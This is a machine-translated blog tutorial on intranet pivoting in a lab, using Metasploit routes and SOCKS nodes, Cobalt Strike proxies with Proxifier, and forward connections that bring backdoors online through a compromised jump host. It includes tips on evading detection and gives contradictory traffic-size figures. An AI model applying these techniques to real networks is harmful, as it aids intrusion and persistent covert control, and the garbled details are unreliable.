Intranet Security: Detailed Explanation of Proxy Technology

Internet 2023-06-18 20:16:38 views: null

Table of contents

The network topology diagram and description used in the agent technology experiment

proxy technology

SOCK protocol

Reasons to use proxy technology

Forward proxy and reverse proxy

Combat 1: MSF Agent Communication

Explanation of experimental principle

1. Meterpreter establishes routing

2. MSF establishes nodes

3. Create a proxy to MSF

Combat 2: CS agent communication

Explanation of experimental principle

1. CS establishes SOCKS proxy

2. Use proxifier to set proxy 

​edit

Combat 3: CS forward connection goes online

Explanation of experimental principle

1. Configure the listener to let win10 forward its own traffic to the local port 2222

2. CS execution order goes online

Combat 4: MSF forward connection goes online

Explanation of experimental principle

1. Generate a backdoor and forward traffic to its own port

2. MSF active access

About reverse connections

Idea summary

 

This article will introduce the proxy technology often used in intranet attack and defense, forward connection and reverse connection.

There are three stages in intranet attack and defense:

1. Establish communication using proxy technology to establish a connection between the attack aircraft and the target

2. Lateral movement

3. After the post-infiltration obtains the host authority, use the tunnel technology to transfer the authority to the attacking machine

All the implementations in this article have obtained system permissions, because they do not involve intranet lateral movement, and are just for researching the first and third stages.

The network topology diagram and description used in the agent technology experiment

Network segment situation: Vmware configuration network

Attacker: 47.94.236.117 

target drone:

        Win 7: The only host on the intranet that can go out of the network can also communicate with the host on the intranet 192.168.11.* network segment

                192.168.1.119 (export of external network) 192.168.11.128 (intranet Vmware2)

        win 10: Intranet host traffic does not go online

                192.168.11.129 (intranet Vmware2) 192.168.22.130 (intranet Vmware3)

        win 2008: Intranet host traffic does not go online

                192.168.22.131 (intranet Vmware3) 192.168.33.129 (intranet Vmware4)

        win 2012: Intranet host traffic does not go online

                192.168.33.130 (intranet Vmware4)

proxy technology

The protocol used by proxy technology is SOCK 4/5

Commonly used proxy tools include SockCap, Proxifier, ProxyChains, etc.

The use of proxy tools will be demonstrated in the following experiments

SOCK protocol

The SOCK (Socket) protocol is a network protocol used to provide communication between network applications in a computer network. It is a general-purpose, connection-oriented protocol that is often used to implement communication between clients and servers.

The SOCK protocol can be divided into two main versions: SOCKS4 and SOCKS5. Here is a brief introduction to the two versions:

  1. SOCKS4 protocol:

    • The SOCKS4 protocol is the first version of the SOCK protocol, first developed by David Koblas.
    • It is a simple protocol that only supports IPv4 addresses, does not support authentication, and is suitable for IPv4 environments.
    • The client sends a connection request to the server and specifies the IP address and port number of the target host.
    • The server forwards the request to the target host and forwards the data stream to the client after the connection is established.

  2. SOCKS5 protocol:

    • The SOCKS5 protocol is the second version of the SOCK protocol, defined by the RFC 1928 specification.
    • It is an extended version of the SOCKS protocol, supporting more functions and features.
    • The SOCKS5 protocol supports IPv4 and IPv6 addresses, and supports various authentication methods, such as no authentication, username/password authentication, etc.
    • The client sends a connection request to the server and specifies the domain name or IP address and port number of the target host.
    • The server establishes a connection with the target host according to the target address requested by the client, and forwards the data flow to the client.

The SOCK protocol is mainly used to implement the network proxy function, and can establish an intermediate channel between the local computer and the remote server, so that network requests can be forwarded and processed through this channel. This has important applications in certain scenarios, such as accessing blocked websites behind a firewall, hiding real IP addresses, etc.

The SOCK protocol does not belong to the seven-layer model in the OSI (Open Systems Interconnection) reference model. It is more regarded as an independent protocol or protocol family for implementing network proxy functions. However , functionally, the SOCK protocol involves some functions of the transport layer and the application layer.

Specifically, the SOCK protocol is responsible for establishing and managing connections and data transmission at the transport layer. It is responsible for processing related functions of the network proxy at the application layer, such as resolving target addresses, forwarding data, and so on.

Although the SOCK protocol plays a key role between the transport layer and the application layer, it does not clearly define a specific layer in the OSI reference model. It is more like a collection of protocols operating between the transport layer and the application layer, and the specific implementation may vary. The SOCK protocol is usually implemented in the network stack of the operating system

To sum up, the SOCK protocol functionally involves the transport layer and the application layer, but it does not clearly define a specific layer in the OSI reference model.

Reasons to use proxy technology

Judging from the performance of proxy technology, traffic is mainly proxied through the springboard machine .

Proxy technology will be illustrated through the network topology diagram above

Reason 1 for using proxy technology: Establish communication between attacking aircraft and intranet hosts

The Ubuntu host was used as our attack machine, and win7 was taken down as an external network host through web penetration testing. But Ubuntu can't win win10, because Ubuntu can't access it.

The second reason for using proxy technology: to avoid being discovered, to hide oneself, to execute the attack target

There are a large number of penetration testing tools installed on Ubuntu. Some people may think of uploading tools on win7, and win10 can be attacked through win7. The same is true for other intranet hosts after that. Doing so complies with network communications, but is extremely risky. First of all, it is necessary to consider that there may be security devices, traffic detection devices, and anti-software in the real environment. Uploading several gigabytes of traffic is too loud and easy to be discovered. In general, the traffic size should be around 500KB, not more than 1KB.

The third reason for using proxy technology: to achieve persistent control

After taking the brand new through lateral penetration, we need to bounce the authority back to the attacking machine to achieve persistent control. Because a large number of tools and software are integrated on the attack aircraft, they need to be used to maintain permissions.

Forward proxy and reverse proxy

When we establish the connection between the target aircraft and the attack aircraft, we often need to consider the forward and reverse issues of the connection.

In the actual intranet environment, the operation and maintenance personnel often have settings for the firewall on the host. For example, some hosts only allow port 80 communication, and some even prohibit all TCP protocols. The operation and maintenance personnel will make security considerations based on the function and status of the host, and make restrictions on inbound and outbound rules. Often the inbound rules are set strictly and the outbound rules are looser.

Forward and reverse are for the target machine.

  • Forward connection: the proxy machine actively connects to the target machine
  • Reverse connection: the target machine actively connects to the proxy machine

Forward and reverse technologies are often selected for the firewall rule settings.

In the attack and defense of the intranet, it is necessary to establish the situation that the agency communication has been established.

Forward connection: The target sends traffic to one of its own ports, and the attack machine actively connects, which is suitable for loose inbound rules

Reverse connection: The target sends traffic to a certain port of the attacking machine, and the target actively connects, which is suitable for strict inbound and loose outbound

Combat 1: MSF Agent Communication

First of all, win7 has been obtained by us as a system authority, and it is already online

Goal: establish communication and win win10

Explanation of experimental principle

Turn on routing, which means MSF also enters the 192.168.11.* network segment

Turning on the node is to receive the traffic from the agent and forward it through the route

Win7 and MSF can be regarded as one, and the traffic is equivalent to the flow from win7

1. Meterpreter establishes routing

add route

At this time, MSF can communicate with the network segment 192.168.11.*.

However, other tool networks on the server where MSF is located cannot enjoy this route. Only Meterpreter enjoys it.

2. MSF establishes nodes

To establish a node, use the MSF module to establish a node, which is equivalent to establishing a connection node in MSF, and other traffic can connect to it.

Account password can choose not to set

The port here is opened on the MSF server

At this time, any host can set a proxy to MSF to forward traffic into the intranet of 192.168.11.*

3. Create a proxy to MSF

Set up a proxy on an external host. The address of the proxy is the MSF server, and the traffic of this external host will be forwarded to MSF.

set proxy

 It should be noted that the SOCK protocol needs to be corresponding.

A proxy can be configured for a program (EXE), and traffic will be forwarded during communication

 

Successfully accessed the intranet host

Realized the communication between the attack machine A and the intranet host 

At this time, we can put the penetration testing tool on this host and start testing.

Combat 2: CS agent communication

First of all, win7 has been obtained by us as a system authority, and it is already online

Goal: establish communication and win win10

Explanation of experimental principle

You can regard CS and win7 as one, and the traffic is equivalent to going out from win7

1. CS establishes SOCKS proxy

This process is the same as MSF setting routing and setting nodes

 

2. Use proxifier to set proxy 

 connected

Configure proxy rules

The traffic of the set application will go through the proxy

The set access host IP will go through the proxy

 successful communication

Successful newsletter! ! !

Combat 3: CS forward connection goes online

Significance: By establishing a forward connection, the authority of win10 is transferred to CS to realize persistent control

CS can also be a reverse proxy, just like the MSF below.

Explanation of experimental principle

This is suitable for loose inbound rules

Win10 sends its own traffic to the local port

win7 forward access to win10 and ports, which is equivalent to CS forward access to win10

1. Configure the listener to let win10 forward its own traffic to the local port 2222

name=1 is the listener for configuring the reverse proxy

name=2 is to configure the forward proxy listener

Create a backdoor and execute it on win10 (don’t be ridiculous, the experiment is just to show the transfer of authority, and the horizontal movement has been completed)

2. CS execution order goes online

Forward agent online:

It is to connect through win7, so the execution of the command should also be done on win7, select the session connected to win7

connect 192.168.11.128 2222

 online! ! !

 

Combat 4: MSF forward connection goes online

Significance: By establishing a forward connection, the authority of win10 is transferred to MSF to realize persistent control

MSF can also be used as a forward proxy, just like CS above.

Explanation of experimental principle

This is suitable for strict inbound rules and loose outbound rules

win10 sends the traffic to the port of win7, and MSF listens to the port of win7, which is equivalent to handing it over to MSF

1. Generate a backdoor and forward traffic to its own port

 

2. MSF active access

About reverse connections

The experiment here only made forward connection, because the reverse connection is more troublesome, and the reverse connection is to bypass the inbound rules through the active connection of the target. Based on this purpose, there is actually a better idea, which is to use tunneling technology (Next issue preview!!!)

The reverse connection idea takes win10 to win7 as an example:

  1. The backdoor is generated and bound to port 192.168.11.128 4444 of win7
  2. Then port forward the 4444 data to the local 5555
  3. Then go to actively connect to win10 to receive data

The operation is too cumbersome, it is better to use the tunnel technology directly

Intranet Security: A Preliminary Exploration of Tunnel Technology

In my blog, there is tunneling technology about ICMP protocol, you can refer to it, hh

Idea summary

Agent technology summary:

Background: Get a host permission on the intranet and go online to MSF/CS, IP: 192.168.x.*

MSF agent build:

  1. Use Meterpreter that controls 192.168.x.* to start routing, and MSF is equivalent to entering this network segment
  2. Turn on the node and support the forwarding traffic from the proxy
  3. Attacker A (external network, arsenal) configures the proxy to MSF

CS agency establishment: as long as you have hands

  1. Enable SOCKS proxy on session 192.168.x.*
  2. Configure the proxy device on the attack machine A

The greatest significance of establishing communication is: it can realize the communication between the attack aircraft and the host on the intranet, and only with communication can lateral movement

Forward and reverse connection summary:

  • The selection method should be based on the local conditions of the firewall
  • In the attack and defense of the intranet, it is necessary to establish the situation that the agency communication has been established.
  • Forward connection: The target sends traffic to one of its own ports, and the attack machine actively connects, which is suitable for loose inbound rules
  • Reverse connection: The target sends traffic to a certain port of the attacking machine, and the target actively connects, which is suitable for strict inbound and loose outbound

Guess you like

Origin blog.csdn.net/qq_61553520/article/details/131021667
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com